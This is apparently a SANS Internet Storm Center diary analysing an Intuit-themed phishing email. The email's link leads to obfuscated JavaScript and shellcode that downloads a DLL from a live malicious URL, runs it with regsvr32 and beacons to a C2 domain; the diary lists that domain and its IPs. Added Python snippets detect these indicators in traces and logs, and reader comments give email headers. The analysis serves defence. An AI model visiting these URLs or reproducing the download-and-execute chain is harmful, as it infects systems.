Phishing with obfuscated javascript, shellcode and malware

Published: 2012-03-02
Last Updated: 2012-03-03 05:02:38 UTC
by Manuel Humberto Santander Pelaez (Version: 1)
8 comment(s)

Be careful with the links showed in this diary because they are live and could infect your computer if not handled properly

Phishing e-mail artwork is becoming more effective every day. Users are having a hard time distinguishing the fake sites from the real ones. I am going to show you a different kind of phishing e-mail: it does not take the user to a website to steal a password, but instead installs malware on the computer using obfuscated JavaScript and shellcode.

I received today the following message:

[Image: Intuit SPAM]

This looked strange. I reviewed the link, which pointed me to http://thedizzybaker.com/wp-includes/int-market.html. The following JavaScript appeared:

[Image: First JavaScript]

This JavaScript is obfuscated. I used Firebug to get more information and found an iframe pointing to another website:

[Image: Iframe within malicious JavaScript]

Following the new link, we find another obfuscated JavaScript. Let's look at a snippet of it:

[Image: JavaScript snippet]

Now here is where the malicious stuff begins. After deobfuscating the script, we find the following:

  •  The script tries to determine which browser is running on the system:

[Image: Browser detection]

  •  The script tries to determine the installed Adobe Flash and Adobe Reader versions:

[Image: Flash version detection]

[Image: Adobe Reader version detection]

  •  A shellcode is executed:

[Image: Shellcode executed]

Let's take a look at the shellcode. It executes the following instructions:

  1. kernel32.VirtualProtect: This function is called in the shellcode to establish a 255-byte memory region whose memory protection attributes are modified. For more information about the available attributes, see http://msdn.microsoft.com/en-us/library/windows/desktop/aa366786%28v=vs.85%29.aspx.
  2. kernel32.LoadLibraryA: This function is called to load the urlmon.dll library, which is used to transfer data over the HTTP protocol. A couple of the functions exported by that file are shown here: [Image: URLMON functions]
  3. urlmon.URLDownloadToFileA: This function is called to download http://migdaliasbistro.net/w.php?f=f7d19&e=1 and save it as wpbt0.dll.
  4. kernel32.WinExec: This function is called to register the DLL using regsvr32 -s, which executes it.
  5. kernel32.TerminateThread: This function is called to end the execution of the shellcode.
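As an added example (not part of the original diary), here is a small Python check that reads a constructed, sandbox-style API trace and flags the download-and-execute chain of steps 2 to 4 above: urlmon.dll loaded, URLDownloadToFileA dropping a file, then WinExec launching regsvr32 on that file. The trace format and its argument values are constructed to mirror the steps listed in the diary.

```python
import re

# Constructed sandbox-style API trace (not output from any real tool): one call per
# line in the form "module.api(arg1, arg2, ...)", mirroring the five shellcode steps.
SAMPLE_TRACE = """\
kernel32.VirtualProtect(0x0013f000, 255, PAGE_EXECUTE_READWRITE)
kernel32.LoadLibraryA("urlmon.dll")
urlmon.URLDownloadToFileA(0, "http://migdaliasbistro.net/w.php?f=f7d19&e=1", "wpbt0.dll", 0, 0)
kernel32.WinExec("regsvr32 -s wpbt0.dll", 0)
kernel32.TerminateThread(0xffffffff, 0)
"""

CALL_RE = re.compile(r'^(?P<api>[\w.]+)\((?P<args>.*)\)$')


def parse_trace(text):
    """Return a list of (api_name, [args]); string arguments lose their quotes."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line.strip())
        if not m:
            continue
        raw = m.group('args')
        args = [a.strip().strip('"') for a in raw.split(',')] if raw else []
        calls.append((m.group('api'), args))
    return calls


def find_download_and_execute(calls):
    """Flag the chain LoadLibraryA(urlmon) -> URLDownloadToFileA -> WinExec on the dropped
    file. Returns a dict of indicators, or None when the chain is not present."""
    urlmon_loaded = False
    dropped = {}  # saved path (lower-case) -> source URL
    for api, args in calls:
        if api.endswith('LoadLibraryA') and args and args[0].lower() == 'urlmon.dll':
            urlmon_loaded = True
        elif api.endswith('URLDownloadToFileA') and urlmon_loaded and len(args) >= 3:
            dropped[args[2].lower()] = args[1]
        elif api.endswith('WinExec') and args:
            cmd = args[0]
            for path, url in dropped.items():
                if path in cmd.lower():
                    return {'url': url, 'file': path, 'command': cmd,
                            'regsvr32': 'regsvr32' in cmd.lower()}
    return None
```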

The file downloaded in step 3 is a DLL with MD5 c3124a2981d8e1b9e13e8c21c96448f7. VirusTotal shows a 7/43 detection ratio. It injects into explorer.exe and performs inline hooking of ntdll.dll. Once installed, it reports to hbirjhcnsuiwgtrq.ru, which resolves to the following IP addresses: 94.20.30.91, 98.103.133.13, 173.203.211.157, 211.44.250.173, 46.137.85.218, 83.170.91.152, 87.120.41.155, using an HTTP POST to the /rwx/B2_9w3/in/ location.
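As an added example (not the diary's own code), the following Python scans constructed proxy-style log lines for the two network stages described in this diary: the payload download URL shape (w.php?f=<hex>&e=<n>) and the HTTP POST check-in to the C2 path, matched against the domain and the resolved IP addresses listed above. The log line format is an assumption made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the diary: C2 domain, its resolved IPs and the POST path,
# plus the payload URL shape (w.php?f=<hex>&e=<n>) from the shellcode download step.
C2_DOMAIN = 'hbirjhcnsuiwgtrq.ru'
C2_IPS = {'94.20.30.91', '98.103.133.13', '173.203.211.157', '211.44.250.173',
          '46.137.85.218', '83.170.91.152', '87.120.41.155'}
C2_PATH = '/rwx/B2_9w3/in/'
PAYLOAD_RE = re.compile(r'/w\.php$')

# Constructed log lines (assumed format): "<unix_ts> <client_ip> <method> <url> <status>"
SAMPLE_LOG = """\
1330650001 10.1.1.5 GET http://thedizzybaker.com/wp-includes/int-market.html 200
1330650003 10.1.1.5 GET http://migdaliasbistro.net/w.php?f=f7d19&e=1 200
1330650010 10.1.1.5 POST http://hbirjhcnsuiwgtrq.ru/rwx/B2_9w3/in/ 200
1330650020 10.1.1.7 POST http://94.20.30.91/rwx/B2_9w3/in/ 200
1330650030 10.1.1.9 GET http://example.org/index.html 200
"""


def classify(method, url):
    """Return a stage label for one request, or None when it matches no indicator."""
    u = urlsplit(url)
    host = u.hostname or ''
    # C2 check-in: POST to the known path, by domain name or by any resolved IP.
    if method == 'POST' and u.path == C2_PATH and (host == C2_DOMAIN or host in C2_IPS):
        return 'c2-checkin'
    # Payload download: GET .../w.php with a hex "f" parameter and an "e" parameter.
    if method == 'GET' and PAYLOAD_RE.search(u.path):
        q = parse_qs(u.query)
        if 'f' in q and 'e' in q and re.fullmatch(r'[0-9a-f]+', q['f'][0]):
            return 'payload-download'
    return None


def scan_log(text):
    """Return [(client_ip, stage, url)] for every line that hits an indicator."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        _, client, method, url, _ = parts[:5]
        stage = classify(method, url)
        if stage:
            hits.append((client, stage, url))
    return hits
```

A client that shows the payload download followed by a check-in within a short window is the host to pull for the explorer.exe injection described above.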

Such threats are increasing, and controlling them requires establishing malware control measures as part of the Information Security Architecture of the company, such as the following:

  • Antimalware perimeter defense: I recommend using the Trend Micro and McAfee web gateways. They are scalable and integrate very well with the antimalware monitoring system inside the corporation. This measure helps protect users from downloading malicious code like JavaScript and executables.
  • Host IPS: The antimalware control is not enough these days, as the threats are evolving and the antivirus companies are no longer able to control all emerging malware attacks in real time. This tool is used to prevent the exploitation of vulnerabilities on computers, such as buffer overflows and code injection, among others. Thus, the computer is protected until the virus signature is out and the antimalware program is able to deal with the respective threat.
  • Antimalware: This is the conventional antimalware control that is sold by the antivirus companies.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org


Comments

Hi Manuel,

This is a great post. Can you help explain more how you decoded the obfuscated code with Firebug and eventually found the shellcode? I wanted to replicate your findings for educational purposes.
Why use active links in this diary? Why not add some spaces, etc. to protect the unwary visitor? I am sure a small percentage of your readers are unskilled, perhaps hitting SANS for the first time. Why endanger them?
Good morning Manuel,

First I want to say thank you for posting this phishing campaign. Secondly, I wanted to ask if you can update this post with the original sender (e-mail), the subject of the e-mail and, if possible, the Internet headers?

The reason for this request is that this will facilitate the creation of rules with which we can redirect e-mail before end users receive it, and also identify whether anyone already got it but either deleted it or has yet to click on the link within the body of the e-mail.

Thanks
Out of curiosity, what is the source of the graphics of this and other spam emails you receive? Are they embedded in the email itself, linked to the legitimate company's site or hosted on a 3rd party site?

From the copy I received:

From: noreply@careerbuilder.com
Subject: Your Intuit.com order confirmation.
IMG SRC="http://about.intuit.com/sbweb/common/images/header/logo_bar/intuit_logo.gif"
A HREF="hxxp://premiumsoft.com.ar/foobar/index.html"
(Note: http changed to hxxp to protect the foolish, what appears to be a 8-character token replaced by 'foobar' to protect me :) )

Headers: (Again, with a whole bunch of potentially identifying info redacted)
Delivered-To: me@recipient.com
Received: by 10.204.57.194 with SMTP id xxx;
Thu, 1 Mar 2012 xx:xx:xx -0800 (PST)
Received: by 10.180.90.225 with SMTP id xxx;
Thu, 01 Mar 2012 xx:xx:xx -0800 (PST)
Return-Path: <noreply@careerbuilder.com>
Received: from 123-162-192-190.cab.prima.net.ar ([190.192.162.123])
by mx.google.com with ESMTP id xxx;
Thu, 01 Mar 2012 xx:xx:xx -0800 (PST)
Received-SPF: fail (google.com: domain of noreply@careerbuilder.com does not designate 190.192.162.123 as permitted sender) client-ip=190.192.162.123;
Authentication-Results: mx.google.com; spf=hardfail (google.com: domain of noreply@careerbuilder.com does not designate 190.192.162.123 as permitted sender) smtp.mail=noreply@careerbuilder.com
Received: from apache by careerbuilder.com with local (Exim 4.63)
(envelope-from <noreply@careerbuilder.com>)
id xxx
for <me@recipient.com>; Thu, 1 Mar 2012 xx:xx:xx -0300
To: <me@recipient.com>
Subject: Your Intuit.com order confirmation.
Date: Thu, 1 Mar 2012 xx:xx:xx -0300
From: "INTUIT INC." <noreply@careerbuilder.com>
Message-ID: <xxx@careerbuilder.com>
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="------------xxx"

This is a multi-part message in MIME format.
--------------xxx
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="iso-8859-2"
Just thought I'd add that this is a Blackhole exploit kit and this sort of e-mail campaign is very much in use at the moment (I've also seen similar ACH and AICP ones recently).
I'm no expert. I played with having a mail server for a bit. But a few weeks ago, LogWatch reported 1000s of connections to port 25 from an IP that resolved to careerbuilder.com. I just shut the server down. Is careerbuilder.com compromised?
regarding the linking of the logo...
This confirms my theory. I find that most of these phishing scams are cross-linking the legitimate images from the original site in their attack.

Would others concur that this is the typical methodology you see?

I would think these high-value target sites would be able to detect these and serve warning graphics instead of the legitimate logos.
